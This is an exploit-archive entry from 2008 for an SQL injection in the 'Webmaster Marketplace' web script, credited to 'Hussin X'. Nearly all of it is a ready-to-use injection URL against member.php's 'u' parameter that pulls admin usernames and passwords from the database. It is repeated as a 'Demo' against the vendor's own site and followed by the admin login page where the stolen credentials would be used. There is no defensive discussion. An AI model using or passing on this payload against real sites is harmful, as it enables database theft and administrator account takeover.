Webmaster Marketplace (member.php u) SQL Injection Vulnerability

2008-12-10T00:00:00
ID 1337DAY-ID-4403
Type zdt
Reporter Hussin X
Modified 2008-12-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Webmaster Marketplace (member.php u) SQL Injection Vulnerability
================================================================


Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

___________________________________

script  : http://www.unscripts.com/MPS.html

DorK : :(

exploit :
_______

http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--



Demo :
_______

http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--


login :
http://www.site.com/Admin/login.php



#  0day.today [2018-02-20]  #